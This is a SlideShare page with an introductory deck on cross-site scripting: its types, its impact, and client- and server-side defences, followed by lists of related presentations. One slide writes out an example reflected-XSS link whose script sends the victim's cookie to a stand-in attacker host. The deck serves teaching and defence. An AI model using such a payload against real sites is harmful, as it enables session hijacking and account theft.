SlideShare a Scribd company logo
••••••••••••••••••••••••••••••••••
••••••••••••••••••••••••••••••••••
What is XSS (Cross Site Scripting) ?
Types of XSS (Cross Site Scripting)
What is the impact of Cross Site Scripting ?
How can we protect applications against XSS ?
••••••••••••••••••••••••••••••••••
Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in Web applications. XSS enables
attackers to inject client-side script into Web pages.
 Embedded in HTML page
 Supports different languages (JavaScript, VBScript, ActiveX, etc.)
 Most prominent: JavaScript
 Attacker „makes“ Web-Server deliver malicious script code
 Malicious script is executed in Client’s Web Browser
Scripting : Web Browsers can execute commands
Cross-Site : Foreign script sent via server to client
Caused by insufficient input validation.
••••••••••••••••••••••••••••••••••
 Reflected XSS (Non-Persistent)
Three types of XSS :
– Link in other website or email
 Stored XSS (Persistent)
– Forum, bulletin board, feedback form
 Local XSS
– PDF Adobe Reader, Flash player
••••••••••••••••••••••••••••••••••
Send e-mail with </script> tags
embedded in link
Follow the link and script executes
http://mybank.com/account.php?variable=„>
<script>document.location=‚http://badguy.com/cgi-
bin/cookie.cgi‘“%20+document.cookie</script>
Attacker
www.badguy.com
Coockie Collector
!!! attack code !!!
Reflected XSS (Non-Persistent) :
Victim
 Malicious content does not get
stored in the sever
 The server bounces the original input
to the victim without modification
••••••••••••••••••••••••••••••••••
Post Forum Message:
Subject: GET Money for FREE !!!
Body:
<script> attack code </script>
1. Attacker sends malicious code
2. Server stores message
Did you know this?
.....
3. User requests message
4. Message is delivered by server
5. Browser executes script in message
GET Money for FREE !!!
<script> attack code </script>
Get /forum.jsp?fid=122&mid=2241
Attacker
Client
Web Server
GET Money for FREE !!!
<script> attack code </script>
!!! attack code !!!
Re: Error message on startup
.....
I found a solution!
.....
Can anybody help?
.....
Error message on startup
.....
Stored XSS (Persistent) :
••••••••••••••••••••••••••••••••••
Local XSS :
 The injected script does not traverse to the server
••••••••••••••••••••••••••••••••••
 Normal Users :
Access to authentication credentials forWeb application
– Access to personal data (Credit card, Bank Account)
– Access to business data (Bid details, construction details)
– Misuse account (order expensive goods)
 High Privileged Users :
– Control over Web application
– Control / Access : Web server machine
– Control / Access : Backend / Database systems
••••••••••••••••••••••••••••••••••
 Denial-of-Service :
– Crash user’s bowser, Pop-up flodding, Redirection
 Access to user’s machine :
– Upload local data to attacker’s machine
••••••••••••••••••••••••••••••••••
 Client Side :
– Disable JS
– Verify e-mail
– Always update
 Server Side :
– Input validation
– Encode all meta characters send to the client
– Keep track of user sessions
– Web application firewall
– Always test
••••••••••••••••••••••••••••••••••

More Related Content

What's hot

Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)
Nabin Dutta
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)Manish Kumar
 
Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site ScriptingAli Mattash
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Vishal Kumar
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
Michael Coates
 
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)
Daniel Tumser
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting GuideDaisuke_Dan
 
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbharCross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Sandeep Kumbhar
 
Xss attack
Xss attackXss attack
Xss attack
Manjushree Mashal
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
Ritesh Gupta
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf)   it 6873 presentationA8 cross site request forgery (csrf)   it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentation
Albena Asenova-Belal
 
Cross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxCross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert Box
Aaron Weaver
 
CSRF Basics
CSRF BasicsCSRF Basics
Cross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting ExplainedCross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting Explained
Valency Networks
 
Cross site scripting
Cross site scripting Cross site scripting
Web security
Web securityWeb security
Web security
Padam Banthia
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
Daniel Miessler
 
Click jacking
Click jackingClick jacking
Click jacking
Ronan Dunne, CEH, SSCP
 
CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVC
Suvash Shah
 

What's hot (20)

Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
 
Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site Scripting
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting Guide
 
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbharCross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
 
Xss attack
Xss attackXss attack
Xss attack
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf)   it 6873 presentationA8 cross site request forgery (csrf)   it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentation
 
Cross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxCross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert Box
 
CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basics
 
Cross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting ExplainedCross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting Explained
 
Cross site scripting
Cross site scripting Cross site scripting
Cross site scripting
 
Web security
Web securityWeb security
Web security
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
Click jacking
Click jackingClick jacking
Click jacking
 
CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVC
 
Xss ppt
Xss pptXss ppt
Xss ppt
 

Viewers also liked

Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)OWASP Khartoum
 
XSS
XSSXSS
Bigdatapdi2015 150112111012-conversion-gate02
Bigdatapdi2015 150112111012-conversion-gate02Bigdatapdi2015 150112111012-conversion-gate02
Bigdatapdi2015 150112111012-conversion-gate02soniamra
 
How to post an answer/solution and get paid
How to post an answer/solution and get paidHow to post an answer/solution and get paid
How to post an answer/solution and get paid
payforanswer
 
KIDS_Lookbook_EMAIL_FINAL
KIDS_Lookbook_EMAIL_FINALKIDS_Lookbook_EMAIL_FINAL
KIDS_Lookbook_EMAIL_FINALDerek Smith
 
0felicitari 8 martie
0felicitari 8 martie0felicitari 8 martie
0felicitari 8 martie
Violeta Gisculescu
 
Uni2go week4_LL
Uni2go week4_LLUni2go week4_LL
Uni2go week4_LL
UNI2GO
 
How to market your question/project on the web and offer money for solution
How to market your question/project on the web and offer money for solutionHow to market your question/project on the web and offer money for solution
How to market your question/project on the web and offer money for solution
payforanswer
 
03. números racionales
03. números racionales03. números racionales
03. números racionales
dracco17
 
Pieter nortje fitter with dual diesel and auto
Pieter nortje fitter with dual diesel and autoPieter nortje fitter with dual diesel and auto
Pieter nortje fitter with dual diesel and auto
Pieter Nortje
 
Secuencia didáctica gladys
Secuencia didáctica   gladysSecuencia didáctica   gladys
Secuencia didáctica gladysgarbolema
 

Viewers also liked (13)

Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
 
XSS
XSSXSS
XSS
 
Bigdatapdi2015 150112111012-conversion-gate02
Bigdatapdi2015 150112111012-conversion-gate02Bigdatapdi2015 150112111012-conversion-gate02
Bigdatapdi2015 150112111012-conversion-gate02
 
How to post an answer/solution and get paid
How to post an answer/solution and get paidHow to post an answer/solution and get paid
How to post an answer/solution and get paid
 
AANDERSONRESUME
AANDERSONRESUMEAANDERSONRESUME
AANDERSONRESUME
 
KIDS_Lookbook_EMAIL_FINAL
KIDS_Lookbook_EMAIL_FINALKIDS_Lookbook_EMAIL_FINAL
KIDS_Lookbook_EMAIL_FINAL
 
0felicitari 8 martie
0felicitari 8 martie0felicitari 8 martie
0felicitari 8 martie
 
Uni2go week4_LL
Uni2go week4_LLUni2go week4_LL
Uni2go week4_LL
 
How to market your question/project on the web and offer money for solution
How to market your question/project on the web and offer money for solutionHow to market your question/project on the web and offer money for solution
How to market your question/project on the web and offer money for solution
 
Un 2015
Un 2015Un 2015
Un 2015
 
03. números racionales
03. números racionales03. números racionales
03. números racionales
 
Pieter nortje fitter with dual diesel and auto
Pieter nortje fitter with dual diesel and autoPieter nortje fitter with dual diesel and auto
Pieter nortje fitter with dual diesel and auto
 
Secuencia didáctica gladys
Secuencia didáctica   gladysSecuencia didáctica   gladys
Secuencia didáctica gladys
 

Similar to Xss (cross site scripting)

Identifying XSS Vulnerabilities
Identifying XSS VulnerabilitiesIdentifying XSS Vulnerabilities
Identifying XSS Vulnerabilities
n|u - The Open Security Community
 
Xss attack
Xss attackXss attack
Xss attack
Ambuj Kumar
 
WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITY
yashwanthlavu
 
WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITY
yashwanthlavu
 
Do You Write Secure Code? by Erez Metula
Do You Write Secure Code? by Erez MetulaDo You Write Secure Code? by Erez Metula
Do You Write Secure Code? by Erez Metula
Alphageeks
 
Cm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xssCm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xss
dcervigni
 
Web application security
Web application securityWeb application security
Web application securityJin Castor
 
Internet Security
Internet SecurityInternet Security
Internet Security
Mitesh Gupta
 
Cyber Security By Preetish Panda
Cyber Security By Preetish PandaCyber Security By Preetish Panda
Cyber Security By Preetish Panda
Preetish Panda
 
Secure Form Processing and Protection - Sunshine PHP 2015
Secure Form Processing and Protection - Sunshine PHP 2015Secure Form Processing and Protection - Sunshine PHP 2015
Secure Form Processing and Protection - Sunshine PHP 2015
Joe Ferguson
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
David Stockton
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
David Stockton
 
Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application Vulnerabilities
Preetish Panda
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
Stormpath
 

Similar to Xss (cross site scripting) (20)

Identifying XSS Vulnerabilities
Identifying XSS VulnerabilitiesIdentifying XSS Vulnerabilities
Identifying XSS Vulnerabilities
 
Web Security.pdf
Web Security.pdfWeb Security.pdf
Web Security.pdf
 
Xss attack
Xss attackXss attack
Xss attack
 
Cross site scripting XSS
Cross site scripting XSSCross site scripting XSS
Cross site scripting XSS
 
Isys20261 lecture 09
Isys20261 lecture 09Isys20261 lecture 09
Isys20261 lecture 09
 
WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITY
 
WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITY
 
Do You Write Secure Code? by Erez Metula
Do You Write Secure Code? by Erez MetulaDo You Write Secure Code? by Erez Metula
Do You Write Secure Code? by Erez Metula
 
Cm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xssCm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xss
 
Web application security
Web application securityWeb application security
Web application security
 
Internet Security
Internet SecurityInternet Security
Internet Security
 
Cyber Security By Preetish Panda
Cyber Security By Preetish PandaCyber Security By Preetish Panda
Cyber Security By Preetish Panda
 
Codeinjection
CodeinjectionCodeinjection
Codeinjection
 
Secure Form Processing and Protection - Sunshine PHP 2015
Secure Form Processing and Protection - Sunshine PHP 2015Secure Form Processing and Protection - Sunshine PHP 2015
Secure Form Processing and Protection - Sunshine PHP 2015
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application Vulnerabilities
 
Vulnerabilities in Web Applications
Vulnerabilities in Web ApplicationsVulnerabilities in Web Applications
Vulnerabilities in Web Applications
 
4.Xss
4.Xss4.Xss
4.Xss
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
 

Recently uploaded

SluggerPunk Angel Investor Final Proposal
SluggerPunk Angel Investor Final ProposalSluggerPunk Angel Investor Final Proposal
SluggerPunk Angel Investor Final Proposal
grogshiregames
 
Social Media Marketing Strategies .
Social Media Marketing Strategies                     .Social Media Marketing Strategies                     .
Social Media Marketing Strategies .
Virtual Real Design
 
Grow Your Reddit Community Fast.........
Grow Your Reddit Community Fast.........Grow Your Reddit Community Fast.........
Grow Your Reddit Community Fast.........
SocioCosmos
 
Buy Pinterest Followers, Reactions & Repins Go Viral on Pinterest with Socio...
Buy Pinterest Followers, Reactions & Repins  Go Viral on Pinterest with Socio...Buy Pinterest Followers, Reactions & Repins  Go Viral on Pinterest with Socio...
Buy Pinterest Followers, Reactions & Repins Go Viral on Pinterest with Socio...
SocioCosmos
 
LORRAINE ANDREI_LEQUIGAN_HOW TO USE TRELLO
LORRAINE ANDREI_LEQUIGAN_HOW TO USE TRELLOLORRAINE ANDREI_LEQUIGAN_HOW TO USE TRELLO
LORRAINE ANDREI_LEQUIGAN_HOW TO USE TRELLO
lorraineandreiamcidl
 
Your Path to YouTube Stardom Starts Here
Your Path to YouTube Stardom Starts HereYour Path to YouTube Stardom Starts Here
Your Path to YouTube Stardom Starts Here
SocioCosmos
 
Surat Digital Marketing School - course curriculum
Surat Digital Marketing School - course curriculumSurat Digital Marketing School - course curriculum
Surat Digital Marketing School - course curriculum
digitalcourseshop4
 
7 Tips on Social Media Marketing strategy
7 Tips on Social Media Marketing strategy7 Tips on Social Media Marketing strategy
7 Tips on Social Media Marketing strategy
Digital Marketing Lab
 
Unlock TikTok Success with Sociocosmos..
Unlock TikTok Success with Sociocosmos..Unlock TikTok Success with Sociocosmos..
Unlock TikTok Success with Sociocosmos..
SocioCosmos
 
SluggerPunk Final Angel Investor Proposal
SluggerPunk Final Angel Investor ProposalSluggerPunk Final Angel Investor Proposal
SluggerPunk Final Angel Investor Proposal
grogshiregames
 
Multilingual SEO Services | Multilingual Keyword Research | Filose
Multilingual SEO Services |  Multilingual Keyword Research | FiloseMultilingual SEO Services |  Multilingual Keyword Research | Filose
Multilingual SEO Services | Multilingual Keyword Research | Filose
madisonsmith478075
 
Improving Workplace Safety Performance in Malaysian SMEs: The Role of Safety ...
Improving Workplace Safety Performance in Malaysian SMEs: The Role of Safety ...Improving Workplace Safety Performance in Malaysian SMEs: The Role of Safety ...
Improving Workplace Safety Performance in Malaysian SMEs: The Role of Safety ...
AJHSSR Journal
 
“To be integrated is to feel secure, to feel connected.” The views and experi...
“To be integrated is to feel secure, to feel connected.” The views and experi...“To be integrated is to feel secure, to feel connected.” The views and experi...
“To be integrated is to feel secure, to feel connected.” The views and experi...
AJHSSR Journal
 

Recently uploaded (13)

SluggerPunk Angel Investor Final Proposal
SluggerPunk Angel Investor Final ProposalSluggerPunk Angel Investor Final Proposal
SluggerPunk Angel Investor Final Proposal
 
Social Media Marketing Strategies .
Social Media Marketing Strategies                     .Social Media Marketing Strategies                     .
Social Media Marketing Strategies .
 
Grow Your Reddit Community Fast.........
Grow Your Reddit Community Fast.........Grow Your Reddit Community Fast.........
Grow Your Reddit Community Fast.........
 
Buy Pinterest Followers, Reactions & Repins Go Viral on Pinterest with Socio...
Buy Pinterest Followers, Reactions & Repins  Go Viral on Pinterest with Socio...Buy Pinterest Followers, Reactions & Repins  Go Viral on Pinterest with Socio...
Buy Pinterest Followers, Reactions & Repins Go Viral on Pinterest with Socio...
 
LORRAINE ANDREI_LEQUIGAN_HOW TO USE TRELLO
LORRAINE ANDREI_LEQUIGAN_HOW TO USE TRELLOLORRAINE ANDREI_LEQUIGAN_HOW TO USE TRELLO
LORRAINE ANDREI_LEQUIGAN_HOW TO USE TRELLO
 
Your Path to YouTube Stardom Starts Here
Your Path to YouTube Stardom Starts HereYour Path to YouTube Stardom Starts Here
Your Path to YouTube Stardom Starts Here
 
Surat Digital Marketing School - course curriculum
Surat Digital Marketing School - course curriculumSurat Digital Marketing School - course curriculum
Surat Digital Marketing School - course curriculum
 
7 Tips on Social Media Marketing strategy
7 Tips on Social Media Marketing strategy7 Tips on Social Media Marketing strategy
7 Tips on Social Media Marketing strategy
 
Unlock TikTok Success with Sociocosmos..
Unlock TikTok Success with Sociocosmos..Unlock TikTok Success with Sociocosmos..
Unlock TikTok Success with Sociocosmos..
 
SluggerPunk Final Angel Investor Proposal
SluggerPunk Final Angel Investor ProposalSluggerPunk Final Angel Investor Proposal
SluggerPunk Final Angel Investor Proposal
 
Multilingual SEO Services | Multilingual Keyword Research | Filose
Multilingual SEO Services |  Multilingual Keyword Research | FiloseMultilingual SEO Services |  Multilingual Keyword Research | Filose
Multilingual SEO Services | Multilingual Keyword Research | Filose
 
Improving Workplace Safety Performance in Malaysian SMEs: The Role of Safety ...
Improving Workplace Safety Performance in Malaysian SMEs: The Role of Safety ...Improving Workplace Safety Performance in Malaysian SMEs: The Role of Safety ...
Improving Workplace Safety Performance in Malaysian SMEs: The Role of Safety ...
 
“To be integrated is to feel secure, to feel connected.” The views and experi...
“To be integrated is to feel secure, to feel connected.” The views and experi...“To be integrated is to feel secure, to feel connected.” The views and experi...
“To be integrated is to feel secure, to feel connected.” The views and experi...
 

Xss (cross site scripting)